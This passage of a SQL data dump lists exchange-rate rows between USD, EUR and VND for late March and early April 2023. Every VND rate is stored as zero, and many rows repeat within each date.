(1735, 1, 'USD', 1.000000, 2, 'EUR', 0.921910, '2023-03-31'),
(1736, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1737, 2, 'EUR', 1.000000, 1, 'USD', 1.084700, '2023-03-31'),
(1738, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1739, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-31'),
(1740, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-31'),
(1741, 1, 'USD', 0.000000, 2, 'EUR', 0.918610, '2023-03-31'),
(1742, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1743, 2, 'EUR', 0.000000, 1, 'USD', 1.088600, '2023-03-31'),
(1744, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1745, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-31'),
(1746, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-31'),
(1747, 1, 'USD', 1.000000, 2, 'EUR', 0.918610, '2023-03-31'),
(1748, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1749, 2, 'EUR', 1.000000, 1, 'USD', 1.088600, '2023-03-31'),
(1750, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1751, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-31'),
(1752, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-31'),
(1753, 1, 'USD', 0.000000, 2, 'EUR', 0.918610, '2023-03-31'),
(1754, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1755, 2, 'EUR', 0.000000, 1, 'USD', 1.088600, '2023-03-31'),
(1756, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1757, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-31'),
(1758, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-31'),
(1759, 1, 'USD', 1.000000, 2, 'EUR', 0.918610, '2023-03-31'),
(1760, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1761, 2, 'EUR', 1.000000, 1, 'USD', 1.088600, '2023-03-31'),
(1762, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1763, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-31'),
(1764, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-31'),
(1765, 1, 'USD', 0.000000, 2, 'EUR', 0.918610, '2023-03-31'),
(1766, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1767, 2, 'EUR', 0.000000, 1, 'USD', 1.088600, '2023-03-31'),
(1768, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1769, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-31'),
(1770, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-31'),
(1771, 1, 'USD', 1.000000, 2, 'EUR', 0.918610, '2023-03-31'),
(1772, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1773, 2, 'EUR', 1.000000, 1, 'USD', 1.088600, '2023-03-31'),
(1774, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1775, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-31'),
(1776, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-31'),
(1777, 1, 'USD', 0.000000, 2, 'EUR', 0.918610, '2023-03-31'),
(1778, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1779, 2, 'EUR', 0.000000, 1, 'USD', 1.088600, '2023-03-31'),
(1780, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-31'),
(1781, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-31'),
(1782, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-31'),
(1783, 1, 'USD', 1.000000, 2, 'EUR', 0.918610, '2023-04-01'),
(1784, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1785, 2, 'EUR', 1.000000, 1, 'USD', 1.088600, '2023-04-01'),
(1786, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1787, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-01'),
(1788, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-01'),
(1789, 1, 'USD', 0.000000, 2, 'EUR', 0.919540, '2023-04-01'),
(1790, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1791, 2, 'EUR', 0.000000, 1, 'USD', 1.087500, '2023-04-01'),
(1792, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1793, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-01'),
(1794, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-01'),
(1795, 1, 'USD', 1.000000, 2, 'EUR', 0.919540, '2023-04-01'),
(1796, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1797, 2, 'EUR', 1.000000, 1, 'USD', 1.087500, '2023-04-01'),
(1798, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1799, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-01'),
(1800, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-01'),
(1801, 1, 'USD', 0.000000, 2, 'EUR', 0.919540, '2023-04-01'),
(1802, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1803, 2, 'EUR', 0.000000, 1, 'USD', 1.087500, '2023-04-01'),
(1804, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1805, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-01'),
(1806, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-01'),
(1807, 1, 'USD', 1.000000, 2, 'EUR', 0.919540, '2023-04-01'),
(1808, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1809, 2, 'EUR', 1.000000, 1, 'USD', 1.087500, '2023-04-01'),
(1810, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1811, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-01'),
(1812, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-01'),
(1813, 1, 'USD', 0.000000, 2, 'EUR', 0.919540, '2023-04-01'),
(1814, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1815, 2, 'EUR', 0.000000, 1, 'USD', 1.087500, '2023-04-01'),
(1816, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1817, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-01'),
(1818, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-01'),
(1819, 1, 'USD', 1.000000, 2, 'EUR', 0.919540, '2023-04-01'),
(1820, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1821, 2, 'EUR', 1.000000, 1, 'USD', 1.087500, '2023-04-01'),
(1822, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1823, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-01'),
(1824, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-01'),
(1825, 1, 'USD', 0.000000, 2, 'EUR', 0.919540, '2023-04-01'),
(1826, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1827, 2, 'EUR', 0.000000, 1, 'USD', 1.087500, '2023-04-01'),
(1828, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-01'),
(1829, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-01'),
(1830, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-01'),
(1831, 1, 'USD', 1.000000, 2, 'EUR', 0.919540, '2023-04-02'),
(1832, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1833, 2, 'EUR', 1.000000, 1, 'USD', 1.087500, '2023-04-02'),
(1834, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1835, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-02'),
(1836, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-02'),
(1837, 1, 'USD', 0.000000, 2, 'EUR', 0.919540, '2023-04-02'),
(1838, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1839, 2, 'EUR', 0.000000, 1, 'USD', 1.087500, '2023-04-02'),
(1840, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1841, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-02'),
(1842, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-02'),
(1843, 1, 'USD', 1.000000, 2, 'EUR', 0.919540, '2023-04-02'),
(1844, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1845, 2, 'EUR', 1.000000, 1, 'USD', 1.087500, '2023-04-02'),
(1846, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1847, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-02'),
(1848, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-02'),
(1849, 1, 'USD', 0.000000, 2, 'EUR', 0.919540, '2023-04-02'),
(1850, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1851, 2, 'EUR', 0.000000, 1, 'USD', 1.087500, '2023-04-02'),
(1852, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1853, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-02'),
(1854, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-02'),
(1855, 1, 'USD', 1.000000, 2, 'EUR', 0.919540, '2023-04-02'),
(1856, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1857, 2, 'EUR', 1.000000, 1, 'USD', 1.087500, '2023-04-02'),
(1858, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1859, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-02'),
(1860, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-02'),
(1861, 1, 'USD', 0.000000, 2, 'EUR', 0.919540, '2023-04-02'),
(1862, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1863, 2, 'EUR', 0.000000, 1, 'USD', 1.087500, '2023-04-02'),
(1864, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1865, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-02'),
(1866, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-02'),
(1867, 1, 'USD', 1.000000, 2, 'EUR', 0.919540, '2023-04-02'),
(1868, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1869, 2, 'EUR', 1.000000, 1, 'USD', 1.087500, '2023-04-02'),
(1870, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1871, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-02'),
(1872, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-02'),
(1873, 1, 'USD', 0.000000, 2, 'EUR', 0.919540, '2023-04-02'),
(1874, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1875, 2, 'EUR', 0.000000, 1, 'USD', 1.087500, '2023-04-02'),
(1876, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-02'),
(1877, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-02'),
(1878, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-02'),
(1879, 1, 'USD', 1.000000, 2, 'EUR', 0.919540, '2023-04-03'),
(1880, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1881, 2, 'EUR', 1.000000, 1, 'USD', 1.087500, '2023-04-03'),
(1882, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1883, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-03'),
(1884, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-03'),
(1885, 1, 'USD', 0.000000, 2, 'EUR', 0.919540, '2023-04-03'),
(1886, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1887, 2, 'EUR', 0.000000, 1, 'USD', 1.087500, '2023-04-03'),
(1888, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1889, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-03'),
(1890, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-03'),
(1891, 1, 'USD', 1.000000, 2, 'EUR', 0.919540, '2023-04-03'),
(1892, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1893, 2, 'EUR', 1.000000, 1, 'USD', 1.087500, '2023-04-03'),
(1894, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1895, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-03'),
(1896, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-03'),
(1897, 1, 'USD', 0.000000, 2, 'EUR', 0.919540, '2023-04-03'),
(1898, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1899, 2, 'EUR', 0.000000, 1, 'USD', 1.087500, '2023-04-03'),
(1900, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1901, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-03'),
(1902, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-03'),
(1903, 1, 'USD', 1.000000, 2, 'EUR', 0.919540, '2023-04-03'),
(1904, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1905, 2, 'EUR', 1.000000, 1, 'USD', 1.087500, '2023-04-03'),
(1906, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1907, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-03'),
(1908, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-03'),
(1909, 1, 'USD', 0.000000, 2, 'EUR', 0.919540, '2023-04-03'),
(1910, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1911, 2, 'EUR', 0.000000, 1, 'USD', 1.087500, '2023-04-03'),
(1912, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1913, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-03'),
(1914, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-03'),
(1915, 1, 'USD', 1.000000, 2, 'EUR', 0.919540, '2023-04-03'),
(1916, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1917, 2, 'EUR', 1.000000, 1, 'USD', 1.087500, '2023-04-03'),
(1918, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1919, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-03'),
(1920, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-03'),
(1921, 1, 'USD', 0.000000, 2, 'EUR', 0.919540, '2023-04-03'),
(1922, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1923, 2, 'EUR', 0.000000, 1, 'USD', 1.087500, '2023-04-03'),
(1924, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-03'),
(1925, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-03'),
(1926, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-03'),
(1927, 1, 'USD', 1.000000, 2, 'EUR', 0.919540, '2023-04-04'),
(1928, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1929, 2, 'EUR', 1.000000, 1, 'USD', 1.087500, '2023-04-04'),
(1930, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1931, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-04'),
(1932, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-04'),
(1933, 1, 'USD', 0.000000, 2, 'EUR', 0.919960, '2023-04-04'),
(1934, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1935, 2, 'EUR', 0.000000, 1, 'USD', 1.087000, '2023-04-04'),
(1936, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1937, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-04'),
(1938, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-04'),
(1939, 1, 'USD', 1.000000, 2, 'EUR', 0.919960, '2023-04-04'),
(1940, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1941, 2, 'EUR', 1.000000, 1, 'USD', 1.087000, '2023-04-04'),
(1942, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1943, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-04'),
(1944, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-04'),
(1945, 1, 'USD', 0.000000, 2, 'EUR', 0.919960, '2023-04-04'),
(1946, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1947, 2, 'EUR', 0.000000, 1, 'USD', 1.087000, '2023-04-04'),
(1948, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1949, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-04'),
(1950, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-04'),
(1951, 1, 'USD', 1.000000, 2, 'EUR', 0.919960, '2023-04-04'),
(1952, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1953, 2, 'EUR', 1.000000, 1, 'USD', 1.087000, '2023-04-04'),
(1954, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1955, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-04'),
(1956, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-04'),
(1957, 1, 'USD', 0.000000, 2, 'EUR', 0.919960, '2023-04-04'),
(1958, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1959, 2, 'EUR', 0.000000, 1, 'USD', 1.087000, '2023-04-04'),
(1960, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1961, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-04'),
(1962, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-04'),
(1963, 1, 'USD', 1.000000, 2, 'EUR', 0.919960, '2023-04-04'),
(1964, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1965, 2, 'EUR', 1.000000, 1, 'USD', 1.087000, '2023-04-04'),
(1966, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1967, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-04'),
(1968, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-04'),
(1969, 1, 'USD', 0.000000, 2, 'EUR', 0.919960, '2023-04-04'),
(1970, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1971, 2, 'EUR', 0.000000, 1, 'USD', 1.087000, '2023-04-04'),
(1972, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-04'),
(1973, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-04'),
(1974, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-04'),
(1975, 1, 'USD', 1.000000, 2, 'EUR', 0.919960, '2023-04-05'),
(1976, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-05'),
(1977, 2, 'EUR', 1.000000, 1, 'USD', 1.087000, '2023-04-05'),
(1978, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-05'),
(1979, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-05'),
(1980, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-05'),
(1981, 1, 'USD', 0.000000, 2, 'EUR', 0.917350, '2023-04-05'),
(1982, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-05'),
(1983, 2, 'EUR', 0.000000, 1, 'USD', 1.090100, '2023-04-05'),
(1984, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-05'),
(1985, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-05'),
(1986, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-05'),
(1987, 1, 'USD', 1.000000, 2, 'EUR', 0.917350, '2023-04-05'),
(1988, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-05'),
(1989, 2, 'EUR', 1.000000, 1, 'USD', 1.090100, '2023-04-05'),
(1990, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-05'),
(1991, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-05'),
(1992, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-05'),
(1993, 1, 'USD', 0.000000, 2, 'EUR', 0.917350, '2023-04-05'),
(1994, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-05'),
(1995, 2, 'EUR', 0.000000, 1, 'USD', 1.090100, '2023-04-05'),
(1996, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-05'),
(1997, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-05'),
(1998, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-05'),
(1999, 1, 'USD', 1.000000, 2, 'EUR', 0.917350, '2023-04-05'),
(2000, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-05'),
(2001, 2, 'EUR', 1.000000, 1, 'USD', 1.090100, '2023-04-05'),
(2002, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-05'),
(2003, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-05'),
(2004, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-05'),
(2005, 1, 'USD', 0.000000, 2, 'EUR', 0.917350, '2023-04-05'),
(2006, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-05'),
(2007, 2, 'EUR', 0.000000, 1, 'USD', 1.090100, '2023-04-05'),
(2008, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-05'),
(2009, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-05'),
(2010, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-05'),
(2011, 1, 'USD', 1.000000, 2, 'EUR', 0.917350, '2023-04-05'),
(2012, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-05'),
(2013, 2, 'EUR', 1.000000, 1, 'USD', 1.090100, '2023-04-05'),
(2014, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-05'),
(2015, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-05'),
(2016, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-05'),
(2017, 1, 'USD', 0.000000, 2, 'EUR', 0.917350, '2023-04-05'),
(2018, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-05'),
(2019, 2, 'EUR', 0.000000, 1, 'USD', 1.090100, '2023-04-05'),
(2020, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-05'),
(2021, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-05'),
(2022, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-05'),
(2023, 1, 'USD', 1.000000, 2, 'EUR', 0.917350, '2023-04-06'),
(2024, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2025, 2, 'EUR', 1.000000, 1, 'USD', 1.090100, '2023-04-06'),
(2026, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2027, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-06'),
(2028, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-06'),
(2029, 1, 'USD', 0.000000, 2, 'EUR', 0.914080, '2023-04-06'),
(2030, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2031, 2, 'EUR', 0.000000, 1, 'USD', 1.094000, '2023-04-06'),
(2032, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2033, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-06'),
(2034, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-06'),
(2035, 1, 'USD', 1.000000, 2, 'EUR', 0.914080, '2023-04-06'),
(2036, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2037, 2, 'EUR', 1.000000, 1, 'USD', 1.094000, '2023-04-06'),
(2038, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2039, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-06'),
(2040, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-06'),
(2041, 1, 'USD', 0.000000, 2, 'EUR', 0.914080, '2023-04-06'),
(2042, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2043, 2, 'EUR', 0.000000, 1, 'USD', 1.094000, '2023-04-06'),
(2044, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2045, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-06'),
(2046, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-06'),
(2047, 1, 'USD', 1.000000, 2, 'EUR', 0.914080, '2023-04-06'),
(2048, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2049, 2, 'EUR', 1.000000, 1, 'USD', 1.094000, '2023-04-06'),
(2050, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2051, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-06'),
(2052, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-06'),
(2053, 1, 'USD', 0.000000, 2, 'EUR', 0.914080, '2023-04-06'),
(2054, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2055, 2, 'EUR', 0.000000, 1, 'USD', 1.094000, '2023-04-06'),
(2056, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2057, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-06'),
(2058, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-06'),
(2059, 1, 'USD', 1.000000, 2, 'EUR', 0.914080, '2023-04-06'),
(2060, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2061, 2, 'EUR', 1.000000, 1, 'USD', 1.094000, '2023-04-06'),
(2062, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2063, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-06'),
(2064, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-06'),
(2065, 1, 'USD', 0.000000, 2, 'EUR', 0.914080, '2023-04-06'),
(2066, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2067, 2, 'EUR', 0.000000, 1, 'USD', 1.094000, '2023-04-06'),
(2068, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-06'),
(2069, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-06'),
(2070, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-06'),
(2071, 1, 'USD', 1.000000, 2, 'EUR', 0.914080, '2023-04-07'),
(2072, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2073, 2, 'EUR', 1.000000, 1, 'USD', 1.094000, '2023-04-07'),
(2074, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2075, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-07'),
(2076, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-07'),
(2077, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-07'),
(2078, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2079, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-07'),
(2080, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2081, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-07'),
(2082, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-07'),
(2083, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-07'),
(2084, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2085, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-07'),
